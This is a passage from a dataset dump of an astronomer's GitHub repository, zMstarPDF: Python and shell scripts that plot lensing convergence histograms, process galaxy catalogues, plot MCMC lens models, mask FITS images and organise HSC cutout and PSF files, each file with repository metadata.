2017\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport sys\n\nmin_kappa = -0.20\nmax_kappa = 1\nmin_kappa_plot = -0.2\nmax_kappa_plot = 0.3\nbin_stat = 2000\nhalfwidth = (max_kappa - min_kappa) / (bin_stat * 2.0)\n\nfile = str(sys.argv[1])\n#root = \"/Users/cerusu/Dropbox/\"\nroot = \"/Volumes/LaCieSubaru/kapparesults/\"\n\ndef statistics(kappa_all_,bin_stat_,min_kappa_,max_kappa_):\n    a, kappa_values = np.histogram([0], bins = bin_stat_, range=(min_kappa_,max_kappa_)) # create an empty histogram of the correct shape\n\n    sum = np.sum(kappa_all_)\n    #meanX = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth)) / sum\n    #meanX2 = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth) ** 2) / sum\n    #std = np.sqrt(meanX2 - meanX**2)\n\n    med = 0\n    i = 0\n    ok = False\n    while (med <= sum/2.0) and (ok == False):\n        med = med + kappa_all_[i]\n        if med > sum/2.0:\n            median = kappa_values[i] + halfwidth\n            ok = True\n        if med == sum/2.0:\n            median = kappa_values[i] + 2 * halfwidth\n            ok = True\n        i = i + 1\n\n    std = 0\n    ok = False\n    i = 0\n    while (std <= sum * 0.16) and (ok == False):\n        std = std + kappa_all_[i]\n        if std > sum * 0.16:\n            std1_ = kappa_values[i] + halfwidth\n            ok = True\n        if med == sum*0.16:\n            std1_ = kappa_values[i] + 2 * halfwidth\n            ok = True\n        i = i + 1\n\n    std = 0\n    ok = False\n    i = 0\n    while (std <= sum*0.84) and (ok == False):\n        std = std + kappa_all_[i]\n        if std > sum*0.84:\n            std1 = kappa_values[i] + halfwidth\n            ok = True\n        if med == sum*0.84:\n            std1 = kappa_values[i] + 2 * halfwidth\n            ok = True\n        i = i + 1\n\n    stddev = (std1 - std1_) / 2\n\n    return median,stddev,kappa_values\n\ndef smooth(x,window_len=11,window='hanning'):\n    \"\"\"smooth the data using a window with requested size.\n\n    This method is based on the convolution of a scaled window with the signal.\n    The signal is prepared by introducing reflected copies of the signal\n    (with the window size) in both ends so that transient parts are minimized\n    in the beginning and end part of the output signal.\n\n    input:\n        x: the input signal\n        window_len: the dimension of the smoothing window; should be an odd integer\n        window: the type of window from 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\n            flat window will produce a moving average smoothing.\n\n    output: the smoothed signal\n\n    see also:\n\n    numpy.hanning, numpy.hamming, numpy.bartlett, numpy.blackman, numpy.convolve\n    scipy.signal.lfilter\n\n    TODO: the window parameter could be the window itself if an array instead of a string\n    NOTE: length(output) != length(input), to correct this: return y[(window_len/2-1):-(window_len/2)] instead of just y.\n    \"\"\"\n\n    if x.ndim != 1:\n        raise ValueError, \"smooth only accepts 1 dimension arrays.\"\n    if not window in ['flat', 'hanning', 'hamming', 'bartlett', 'blackman']:\n        raise ValueError, \"Window is one of 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\"\n    if x.size < window_len:\n        raise ValueError, \"Input vector needs to be bigger than window size.\"\n\n    if window_len<3:\n        return x\n    s=np.r_[x[window_len-1:0:-1],x,x[-2:-window_len-1:-1]]\n    if window == 'flat': #moving average\n        w=np.ones(window_len,'d')\n    else:\n        w=eval('np.'+window+'(window_len)')\n    y=np.convolve(w/w.sum(),s,mode='valid')\n    return y\n\nplt.clf()\n\nkappa_0 = np.loadtxt(file, usecols=[0], unpack=True)\nmedian0,stddev0,kappa_values = statistics(kappa_0,bin_stat,min_kappa,max_kappa)\nkappa_0 = kappa_0 / np.sum(kappa_0 * 
np.abs((kappa_values[:-1]+halfwidth)))\n\n#kappa_1 = np.loadtxt(\"%skappahist_WFI2033_5innermask_nobeta_zgap-1.0_-1.0_fiducial_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_23_meds_increments2_2_2_2_2.cat\" % root, usecols=[0], unpack=True)\n#median1,stddev1,kappa_values = statistics(kappa_1,bin_stat,min_kappa,max_kappa)\n#kappa_1 = kappa_1 / np.sum(kappa_1 * np.abs((kappa_values[:-1]+halfwidth)))\n\n#kappa_2 = np.loadtxt(\"%skappahist_WFI2033_5innermask_nobeta_zgap-1.0_-1.0_fiducial_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_23_meds_increments2_2_2_2_2.cat\" % root, usecols=[0], unpack=True)\n#median2,stddev2,kappa_values = statistics(kappa_2,bin_stat,min_kappa,max_kappa)\n#kappa_2 = kappa_2 / np.sum(kappa_2 * np.abs((kappa_values[:-1]+halfwidth)))\n\n#kappa_3 = np.loadtxt(\"%skappahist_WFI2033_5innermask_nobeta_zgap-1.0_-1.0_fiducial_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_23_meds_increments2_2_2_2_2.cat\" % root, usecols=[0], unpack=True)\n#median3,stddev3,kappa_values = statistics(kappa_3,bin_stat,min_kappa,max_kappa)\n#kappa_3 = kappa_3 / np.sum(kappa_3 * np.abs((kappa_values[:-1]+halfwidth)))\n\n#kappa_4 = np.loadtxt(\"%skappahist_WFI2033_5innermask_nobeta_zgap-1.0_-1.0_fiducial_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_23_meds_increments2_2_2_2_2.cat\" % root, usecols=[0], unpack=True)\n#median4,stddev4,kappa_values = statistics(kappa_4,bin_stat,min_kappa,max_kappa)\n#kappa_4 = kappa_4 / np.sum(kappa_4 * np.abs((kappa_values[:-1]+halfwidth)))\n\n#kappa_5 = np.loadtxt(\"%skappahist_WFI2033_5innermask_nobeta_zgap-1.0_-1.0_fiducial_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_23_meds_increments2_2_2_2_2.cat\" % root, usecols=[0], unpack=True)\n#median5,stddev5,kappa_values = statistics(kappa_5,bin_stat,min_kappa,max_kappa)\n#kappa_5 = kappa_5 / np.sum(kappa_5 * np.abs((kappa_values[:-1]+halfwidth)))\n\n#kappa_6 = np.loadtxt(\"%skappahist_WFI2033_5innermask_nobeta_zgap-1.0_-1.0_fiducial_45_gal_45_gamma_45_oneoverr_120_gal_23_meds_increments2_2_2_2.cat\" % root, usecols=[0], unpack=True)\n#median6,stddev6,kappa_values = statistics(kappa_6,bin_stat,min_kappa,max_kappa)\n#kappa_6 = kappa_6 / np.sum(kappa_6 * np.abs((kappa_values[:-1]+halfwidth)))\n\n#s = \"med=%.3f std=%.3f LOS=%d\" % (median,std1,LOS)\ns0 = \"med=%.3f std=%.3f\" % (median0,stddev0)\n#s1 = \"med=%.3f std=%.3f\" % (median1,stddev1)\n#s2 = \"med=%.3f std=%.3f\" % (median2,stddev2)\n#s3 = \"med=%.3f std=%.3f\" % (median3,stddev3)\n#s4 = \"med=%.3f std=%.3f\" % (median4,stddev4)\n#s5 = \"med=%.3f std=%.3f\" % (median5,stddev5)\n#s6 = \"med=%.3f std=%.3f\" % (median6,stddev6)\nplt.subplot(1,1,1)\nax = plt.subplot(1,1,1)\nax.tick_params(labelsize=15)\nplt.xlim(min_kappa_plot, max_kappa_plot)\nplt.ylim(0, 0.1)\n\nplt.plot(kappa_values[:-1][::1],kappa_0[::1],linewidth=2, label ='', linestyle=':') # every 1th point\nax.text(0.6, 0.90, s0, fontsize=10, transform=ax.transAxes)\n#plt.plot(kappa_values[:-1][::1],kappa_1[::1], linewidth=2, label ='$120: 1 + 1/r + \\gamma$', linestyle='-.') # every 1th point\n#ax.text(0.6, 0.85, s1, fontsize=10, transform=ax.transAxes)\n#plt.plot(kappa_values[:-1][::1],kappa_2[::1], linewidth=2, label ='$120: 1 + \\gamma$; 45: 1', linestyle='--') # every 1th point\n#ax.text(0.6, 0.80, s2, fontsize=10, transform=ax.transAxes)\n#plt.plot(kappa_values[:-1][::1],kappa_3[::1], linewidth=2, label ='$120: 1 + 1/r + \\gamma$; 45: 1') # every 1th point\n#ax.text(0.6, 0.75, s3, fontsize=10,transform=ax.transAxes)\n#plt.plot(kappa_values[:-1][::1],kappa_4[::1],linewidth=2, label 
='$120: 1 + 1/r + \\gamma$; 45: 1 + 1/r') # every 1th point\n#ax.text(0.6, 0.70, s4, fontsize=10,transform=ax.transAxes)\n#plt.plot(kappa_values[:-1][::1],kappa_5[::1],linewidth=2, label ='$45: 1 + \\gamma$; 120: 1') # every 1th point\n#ax.text(0.6, 0.65, s5, fontsize=10,transform=ax.transAxes)\n#plt.plot(kappa_values[:-1][::1],kappa_6[::1],linewidth=2, label ='$45: 1 + 1/r + \\gamma$; 120: 1') # every 1th point\n#ax.text(0.6, 0.60, s6, fontsize=10,transform=ax.transAxes)\n\nwinlen = 12\n#smooth(kappa_3,winlen,'flat')\n#smooth(kappa_3,winlen,'hanning')\n#smooth(kappa_3,winlen,'hamming')\n#smooth(kappa_3,winlen,'bartlett')\n#smooth(kappa_3,winlen,'blackman')\n#plt.plot(kappa_values[:-1],smooth(kappa_3,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='k', linewidth=2, label ='$1 + 1/r + \\gamma$')\nplt.plot(kappa_values[:-1],smooth(kappa_0,winlen,'flat')[(winlen/2-1):-(winlen/2)],linewidth=2, label ='$1 + 1/r + \\gamma$')\nplt.xlabel(r'$\\kappa$', fontsize=20)\nplt.ylabel(r'normalized counts', fontsize=20)\nplt.legend(loc=\"lower right\")\nplt.savefig('%s.png' % file[:-4], dpi=250, bbox_inches='tight')\n" }, { "alpha_fraction": 0.6178571581840515, "alphanum_fraction": 0.6642857193946838, "avg_line_length": 34, "blob_id": "9ee06cbe91643dd925594d269ead5948d92c183c", "content_id": "e4e43b0a26baee2e6901032640da9e0e96343692", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 280, "license_type": "no_license", "max_line_length": 73, "num_lines": 8, "path": "/python/catalogue_utilities/converttods9reg.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# read RA and DEC from a file and output a corresponding DS9 regions file\nimport numpy as np\nimport sys\ninput = str(sys.argv[1])\nout = input[:-4] + '_reg.cat'\n\ncat = np.loadtxt(input, usecols = [0,1], unpack=True)\nnp.savetxt(out,cat.T,fmt='fk5;circle( %.6f , %.6f, 0.0005)')\n" }, { "alpha_fraction": 0.6476462483406067, "alphanum_fraction": 0.6811697483062744, "avg_line_length": 41.45454406738281, "blob_id": "4a0130e9b736eca7f5875e685637bc822af2df4a", "content_id": "b3f532ba3aa1ee9481f178434edeb3010c0e878e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1402, "license_type": "no_license", "max_line_length": 200, "num_lines": 33, "path": "/python/catalogue_utilities/combinelephare.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# The code is used to combine two LePhare output catalogues: one which considers non-detections, and one which assumes they are non-observations. 
This is because some non-detections would not execute.\n# Use after running Lephare, where Lephare is used with the inputs from converttolephare_ugrizYJHK.py\n# Use as: combinelephare.py /Users/eduardrusu/lephare_dev/test/i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forlepharewithbpz.cat.MAG_BC03_I09.lephareout\n##########################\n\nimport numpy as np\nimport sys\n\nfile = str(sys.argv[1])\n\nfile_noobs = file[:-28] + \"_noobs.cat.MAG_BC03_I09.lephareout\"\n\nid = 0\nz = 1\nchi_best = 5\nchi_star = 6\nmass_best = 43\nmass_inf = 44\nmass_med = 45\nmass_sup = 46\n\ndata = np.loadtxt(file,usecols=(id,z,chi_best,chi_star,mass_best,mass_inf,mass_med,mass_sup),unpack=True)\ndata_noobs = np.loadtxt(file_noobs,usecols=(id,z,chi_best,chi_star,mass_best,mass_inf,mass_med,mass_sup),unpack=True)\n\nfor i in range(len(data[id])):\n if data[:,i][z] == -99.0:\n data[:,i] = data_noobs[:,i]\n\nfileout = file[:-28] + \"_combined.cat.MAG_BC03_I09.lephareout\"\nstr = \"ID \\t chi_best \\t chi_star \\t mass_best \\t mass_inf \\t mass_med \\t mass_sup\"\ndataout = np.c_[data[0],data[2],data[3],data[4],data[5],data[6],data[7]]\nnp.savetxt(fileout,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.3f \\t %.3f \\t %.3f \\t %.3f ')\n\n" }, { "alpha_fraction": 0.46399998664855957, "alphanum_fraction": 0.656000018119812, "avg_line_length": 34.71428680419922, "blob_id": "e5c201234702e22c28a48bca53f4b76ccc595d4f", "content_id": "8726ef4834640df82f0b57a2e334095b679059db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 750, "license_type": "no_license", "max_line_length": 97, "num_lines": 21, "path": "/python/catalogue_utilities/samplecombinedgaussians.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Combines samples from multiple Gaussians with asymmetric error bars\n\nimport numpy as np\nimport pylab as plt\n\nsamples = 5000\n\nmed = np.array([0.316,0.371,0.349,0.332,0.275,0.291,0.360,0.275,0.360,0.349,0.337])\nstdsup = np.array([+0.041,+0.033,+0.036,+0.028,+0.052,+0.034,+0.043,+0.031,+0.019,+0.038,+0.047])\nstdinf = np.array([-0.007,-0.041,-0.019,-0.012,-0.002,-0.003,-0.003,-0.013,-0.02,-0.026,-0.013])\n\ncombined = np.array([])\nfor i in range(len(med)):\n left = med[i] - abs(med[i] - np.random.normal(med[i],abs(stdinf[i]),samples))\n right = med[i] + abs(med[i] - np.random.normal(med[i],stdsup[i],samples))\n combined = np.r_[combined,left,right]\n\nprint np.percentile(combined,[16,50,84])\nplt.clf()\nplt.hist(combined,bins=100)\nplt.show()\n" }, { "alpha_fraction": 0.49079883098602295, "alphanum_fraction": 0.5767461061477661, "avg_line_length": 64.34246826171875, "blob_id": "60c39b3180db0f56422b0decc4bbcdc02d0498da", "content_id": "79034960f01b07c2006ce7b260fe46c292dd4119", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4782, "license_type": "no_license", "max_line_length": 199, "num_lines": 73, "path": "/python/modeling_utilities/mcmc_einstmagniftimesrc_plot.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Use to plot the results of mcmc_einstmagniftime.py. 
After running mcmc_einstmagniftime.py I need to save the output of its terminal into terminal.dat, then I can run this code\r\n\r\nimport sys\r\nimport os\r\nimport numpy as np\r\nimport corner\r\n\nimg = 4\nfileorig = \"pointSIEgamma.input\"\nfileoutorig = \"pointSIEgamma_einstmagniftime_out_.dat\"\r\nfile = \"terminal.dat\"\nos.system(\"grep \\\"M_Sun/h\\\" %s > %s\" % (file,fileoutorig[:-4]+\"einst.dat\"))\nos.system(\"paste %s %s > %s\" % (fileoutorig,fileoutorig[:-4]+\"einst.dat\",fileoutorig[:-5]+\".dat\"))\nos.system(\"rm %s %s %s\" % (fileoutorig,fileoutorig[:-4]+\"einst.dat\",file))\n\nmcmc = np.loadtxt(fileoutorig[:-5]+\".dat\", usecols=[3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,26,0,1,2])\nmcmc = mcmc[mcmc[:,17]==img]\nmcmc = np.delete(mcmc,17,1)\nmcmcfinal = np.copy(mcmc)\n\n# make sure the order of images is correct:\n\nfor i in range(np.shape(mcmc)[0]):\n if i > 0:\n dist1_1 = np.sqrt((mcmc[i][0]-mcmc[0][0])**2 + (mcmc[i][1]-mcmc[0][1])**2)\n dist2_1 = np.sqrt((mcmc[i][4]-mcmc[0][0])**2 + (mcmc[i][5]-mcmc[0][1])**2)\n dist3_1 = np.sqrt((mcmc[i][8]-mcmc[0][0])**2 + (mcmc[i][9]-mcmc[0][1])**2)\n dist4_1 = np.sqrt((mcmc[i][12]-mcmc[0][0])**2 + (mcmc[i][13]-mcmc[0][1])**2)\n if np.min([dist1_1,dist2_1,dist3_1,dist4_1]) == dist1_1:\n pass\n if np.min([dist1_1,dist2_1,dist3_1,dist4_1]) == dist2_1:\n mcmcfinal[i][0] = mcmcfinal[i][4]; mcmcfinal[i][1] = mcmcfinal[i][5]; mcmcfinal[i][2] = mcmcfinal[i][6]; mcmcfinal[i][3] = mcmcfinal[i][7]\n mcmcfinal[i][4] = mcmc[i][0]; mcmcfinal[i][5] = mcmc[i][1]; mcmcfinal[i][6] = mcmc[i][2]; mcmcfinal[i][7] = mcmc[i][3]\n if np.min([dist1_1,dist2_1,dist3_1,dist4_1]) == dist3_1:\n mcmcfinal[i][0] = mcmcfinal[i][8]; mcmcfinal[i][1] = mcmcfinal[i][9]; mcmcfinal[i][2] = mcmcfinal[i][10]; mcmcfinal[i][3] = mcmcfinal[i][11]\n mcmcfinal[i][8] = mcmc[i][0]; mcmcfinal[i][9] = mcmc[i][1]; mcmcfinal[i][10] = mcmc[i][2]; mcmcfinal[i][11] = mcmc[i][3]\n if np.min([dist1_1,dist2_1,dist3_1,dist4_1]) == dist4_1:\n mcmcfinal[i][0] = mcmcfinal[i][12]; mcmcfinal[i][1] = mcmcfinal[i][13]; mcmcfinal[i][2] = mcmcfinal[i][14]; mcmcfinal[i][3] = mcmcfinal[i][15]\n mcmcfinal[i][12] = mcmc[i][0]; mcmcfinal[i][13] = mcmc[i][1]; mcmcfinal[i][14] = mcmc[i][2]; mcmcfinal[i][15] = mcmc[i][3]\nmcmc = np.copy(mcmcfinal)\nfor i in range(np.shape(mcmc)[0]):\n if i > 0:\n dist2_2 = np.sqrt((mcmc[i][4]-mcmc[0][4])**2 + (mcmc[i][5]-mcmc[0][5])**2)\n dist3_2 = np.sqrt((mcmc[i][8]-mcmc[0][4])**2 + (mcmc[i][9]-mcmc[0][5])**2)\n dist4_2 = np.sqrt((mcmc[i][12]-mcmc[0][4])**2 + (mcmc[i][13]-mcmc[0][5])**2)\n if np.min([dist2_2,dist3_2,dist4_2]) == dist2_2:\n pass\n if np.min([dist2_2,dist3_2,dist4_2]) == dist3_2:\n mcmcfinal[i][4] = mcmcfinal[i][8]; mcmcfinal[i][5] = mcmcfinal[i][9]; mcmcfinal[i][6] = mcmcfinal[i][10]; mcmcfinal[i][7] = mcmcfinal[i][11]\n mcmcfinal[i][8] = mcmc[i][4]; mcmcfinal[i][9] = mcmc[i][5]; mcmcfinal[i][10] = mcmc[i][6]; mcmcfinal[i][11] = mcmc[i][7]\n if np.min([dist2_2,dist3_2,dist4_2]) == dist4_2:\n mcmcfinal[i][4] = mcmcfinal[i][12]; mcmcfinal[i][5] = mcmcfinal[i][13]; mcmcfinal[i][6] = mcmcfinal[i][14]; mcmcfinal[i][7] = mcmcfinal[i][15]\n mcmcfinal[i][12] = mcmc[i][4]; mcmcfinal[i][13] = mcmc[i][5]; mcmcfinal[i][14] = mcmc[i][6]; mcmcfinal[i][15] = mcmc[i][7]\nmcmc = np.copy(mcmcfinal)\nfor i in range(np.shape(mcmc)[0]):\n if i > 0:\n dist3_3 = np.sqrt((mcmc[i][8]-mcmc[0][8])**2 + (mcmc[i][9]-mcmc[0][9])**2)\n dist4_3 = np.sqrt((mcmc[i][12]-mcmc[0][8])**2 + (mcmc[i][13]-mcmc[0][9])**2)\n if np.min([dist3_3,dist4_3]) == dist3_3:\n pass\n if 
np.min([dist3_3,dist4_3]) == dist4_3:\n mcmcfinal[i][12] = mcmcfinal[i][8]; mcmcfinal[i][13] = mcmcfinal[i][9]; mcmcfinal[i][14] = mcmcfinal[i][10]; mcmcfinal[i][15] = mcmcfinal[i][11]\n mcmcfinal[i][8] = mcmc[i][12]; mcmcfinal[i][9] = mcmc[i][13]; mcmcfinal[i][10] = mcmc[i][14]; mcmcfinal[i][11] = mcmc[i][15]\n\nnp.savetxt('%s' % (fileoutorig[:-4] + \"mcmc.dat\"),mcmcfinal,fmt=\"%.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f\")\nos.system(\"rm %s\" % (fileoutorig[:-5]+\".dat\"))\nmcmc = np.loadtxt(fileoutorig[:-4] + \"mcmc.dat\",usecols=[2,3,6,7,10,11,14,15,16,17,18])\n\n# now remove the column with no dynamic range (time delay = 0 for the reference image)\nmcmcfinal = np.delete(mcmc,1,1)\n\r\nfigure = corner.corner(mcmcfinal, labels=np.linspace(1,np.shape(mcmcfinal)[0],np.shape(mcmcfinal)[0]).astype(int).tolist(),quantiles=[0.16, 0.5, 0.84],show_titles=True, title_kwargs={\"fontsize\": 12})\r\nfigure.savefig(fileoutorig[:-4] + \"mcmc.png\", dpi=100)\r\n\r\n" }, { "alpha_fraction": 0.6770833134651184, "alphanum_fraction": 0.7202380895614624, "avg_line_length": 32.599998474121094, "blob_id": "1af6e2dd9e9ad36671da0f758095ea7fa7d2e4dd", "content_id": "72dfe27040e64283e9274355c508f1a86218590b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 672, "license_type": "no_license", "max_line_length": 82, "num_lines": 20, "path": "/python/learn/LRISmosredux.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "from LRIS.resample import resample\nfrom LRIS.LRIStools import *\nfrom LRIS.XSolve import *\n\nindir = '/Users/eduardrusu/Desktop/Reduction/1206m1'\npref = 'r170322_'\nflat = 31\narc = 32\noutname = '1206m1_red'\nslitID(indir,pref,[flat,arc,28],outname,side='bottom')\noldName = None\nsf = True # Update to determine whether you want to see the fit for every exposure\nfor img in [28,29,33]:\n newName = '%s_%2d'%(outname,img)\n XSolve(outname,newName,indir,pref,[flat,arc,img])\n SlitCross(newName,showFit=sf)\n WaveSolve(newName,oldName,showFit=sf)\n resample(newName,nobgsub=False,clobber=True)\n oldName = newName\n sf = True # Don't show the fit anymore if True...\n" }, { "alpha_fraction": 0.7184942960739136, "alphanum_fraction": 0.7610474824905396, "avg_line_length": 37.1875, "blob_id": "62b64a4928f06d45eb0fbbc10ba725290985663c", "content_id": "0fc1d6ff4a4ad75c5fc08d49b24f5a44cae60924", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 611, "license_type": "no_license", "max_line_length": 97, "num_lines": 16, "path": "/python/image_utilities/maskconvolve.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Simple script to change pixel values in custom regions extended by convolution\n\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy.convolution import Gaussian2DKernel\nfrom astropy.convolution import convolve_fft\n\nimage = fits.open('/Users/cerusu/OneDrive - Subaru Telescope/PG1115/tmp_obj.fits')\ndata = image[0].data\ndata[data == 0] = -1000\nkernel = Gaussian2DKernel(10)\nconv = convolve_fft(data, kernel, allow_huge=True)\nconv[conv < -100] = 0\nconv[conv != 0] = 1\nimage[0].data = image[0].data * conv\nimage.writeto('/Users/cerusu/OneDrive - Subaru Telescope/PG1115/tmp_objexpand.fits',clobber=True)\n" }, { "alpha_fraction": 0.6681715846061707, "alphanum_fraction": 0.7674943804740906, "avg_line_length": 23.61111068725586, "blob_id": 
"c4564654ea5c130aaa65982ee892bea35a37d307", "content_id": "b8f368f6de545e93c26b8a07c1be027b8082e84b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 443, "license_type": "no_license", "max_line_length": 100, "num_lines": 18, "path": "/python/scripts/NAOJ/batch_infer31.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log31.out\n#PBS -e Log31.err\n#PBS -N 31\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappa_unbiasedwithshearincrement2228.py WFI2033 5 45 23 meds gal oneoverr mass3overrrms\npython inferkappa_unbiasedwithshearincrement2224.py WFI2033 5 120 23 meds gal oneoverr mass3overrrms\n" }, { "alpha_fraction": 0.5935727953910828, "alphanum_fraction": 0.6283262968063354, "avg_line_length": 60.9549560546875, "blob_id": "85d9002df9cd490f4e4b1c8cbe0169963638003e", "content_id": "76cdd993b6286e40cb201c1e71c62d7d8583c11f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6877, "license_type": "no_license", "max_line_length": 183, "num_lines": 111, "path": "/python/image_utilities/HSCmatchcutoutpsffinalize.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Run after running Topcat on the outputs from HSCmatchcutoutpsf.py. This code renames the files which are suitable for CHITAH.\n# run as python HSCmatchcutoutpsffinalize.py\n\n#from astropy.io import fits\nimport numpy as np\nimport os\nimport glob\nfrom astropy.wcs import WCS\nfrom astropy.io import fits\n\npath = \"/Volumes/LaCieSubaru/Gaia/James/\"\nos.chdir(path)\n# read the outputs from Topcat\n# It seems when I have columns of strings I need to read one column at a time, or they are not searchable...\n# ... 
so I cannot do cutoutspsf_g = np.genfromtxt('cutoutspsf_g.cat',usecols=[0,4,6,7],dtype=\"S90,S90,float,float\")\ncutoutspsf_g_cutout = np.genfromtxt('cutoutspsf_g.cat',usecols=[0],dtype=\"S90\")\ncutoutspsf_g_psf = np.genfromtxt('cutoutspsf_g.cat',usecols=[4],dtype=\"S90\")\ncutoutspsf_g_coord = np.loadtxt('cutoutspsf_g.cat',usecols=[6,7])\n\ncutoutspsf_r_cutout = np.genfromtxt('cutoutspsf_r.cat',usecols=[0],dtype=\"S90\")\ncutoutspsf_r_psf = np.genfromtxt('cutoutspsf_r.cat',usecols=[4],dtype=\"S90\")\ncutoutspsf_r_coord = np.loadtxt('cutoutspsf_r.cat',usecols=[6,7])\n\ncutoutspsf_i_cutout = np.genfromtxt('cutoutspsf_i.cat',usecols=[0],dtype=\"S90\")\ncutoutspsf_i_psf = np.genfromtxt('cutoutspsf_i.cat',usecols=[4],dtype=\"S90\")\ncutoutspsf_i_coord = np.loadtxt('cutoutspsf_i.cat',usecols=[6,7])\n\ncutoutspsf_z_cutout = np.genfromtxt('cutoutspsf_z.cat',usecols=[0],dtype=\"S90\")\ncutoutspsf_z_psf = np.genfromtxt('cutoutspsf_z.cat',usecols=[4],dtype=\"S90\")\ncutoutspsf_z_coord = np.loadtxt('cutoutspsf_z.cat',usecols=[6,7])\n\ncutoutspsf_y_cutout = np.genfromtxt('cutoutspsf_y.cat',usecols=[0],dtype=\"S90\")\ncutoutspsf_y_psf = np.genfromtxt('cutoutspsf_y.cat',usecols=[4],dtype=\"S90\")\ncutoutspsf_y_coord = np.loadtxt('cutoutspsf_y.cat',usecols=[6,7])\n\npsf_onlybandg = np.genfromtxt('psf_onlybandg.cat',usecols=[0],dtype=\"S90\")\npsf_onlybandr = np.genfromtxt('psf_onlybandr.cat',usecols=[0],dtype=\"S90\")\npsf_onlybandi = np.genfromtxt('psf_onlybandi.cat',usecols=[0],dtype=\"S90\")\npsf_onlybandz = np.genfromtxt('psf_onlybandz.cat',usecols=[0],dtype=\"S90\")\npsf_onlybandy = np.genfromtxt('psf_onlybandy.cat',usecols=[0],dtype=\"S90\")\n\nfolder_cutout = glob.glob('arch*')\nfolder_psf = glob.glob('psf-*')\nlist_cutout = np.array([])\nfor i in range(len(folder_cutout)):\n files = glob.glob('%s/*' % folder_cutout[i])\n files_array = np.asarray(files)\n list_cutout = np.r_[list_cutout,files_array]\n\nos.system(\"mkdir S17AforJames\")\nos.system(\"mkdir S17Aonebandpsf\")\nos.system(\"mkdir S17Anopsf\")\n\nfor i in range(len(list_cutout)):\n if '-G-' in list_cutout[i]:\n if list_cutout[i] in cutoutspsf_g_cutout:\n psf = cutoutspsf_g_psf[np.where(cutoutspsf_g_cutout == list_cutout[i])[0][0]]\n coord = cutoutspsf_g_coord[np.where(cutoutspsf_g_cutout == list_cutout[i])[0][0]]\n if psf not in psf_onlybandg:\n os.system(\"cp %s S17AforJames/cutout_%.5f_%.5f_G.fits\" % (list_cutout[i],coord[0],coord[1]))\n os.system(\"cp %s S17AforJames/psf_%.5f_%.5f_G.fits\" % (psf,coord[0],coord[1]))\n else:\n os.system(\"cp %s S17Aonebandpsf/cutout_%.5f_%.5f_G.fits\" % (list_cutout[i],coord[0],coord[1]))\n os.system(\"cp %s S17Aonebandpsf/psf_%.5f_%.5f_G.fits\" % (psf,coord[0],coord[1]))\n else: os.system(\"cp %s S17Anopsf/cutout_%.5f_%.5f_G_%d.fits\" % (list_cutout[i],coord[0],coord[1],i)) # adding the number to the name so I don't lose files with identical input\n if '-R-' in list_cutout[i]:\n if list_cutout[i] in cutoutspsf_r_cutout:\n psf = cutoutspsf_r_psf[np.where(cutoutspsf_r_cutout == list_cutout[i])[0][0]]\n coord = cutoutspsf_r_coord[np.where(cutoutspsf_r_cutout == list_cutout[i])[0][0]]\n if psf not in psf_onlybandr:\n os.system(\"cp %s S17AforJames/cutout_%.5f_%.5f_R.fits\" % (list_cutout[i],coord[0],coord[1]))\n os.system(\"cp %s S17AforJames/psf_%.5f_%.5f_R.fits\" % (psf,coord[0],coord[1]))\n else:\n os.system(\"cp %s S17Aonebandpsf/cutout_%.5f_%.5f_R.fits\" % (list_cutout[i],coord[0],coord[1]))\n os.system(\"cp %s S17Aonebandpsf/psf_%.5f_%.5f_R.fits\" % (psf,coord[0],coord[1]))\n else: os.system(\"cp 
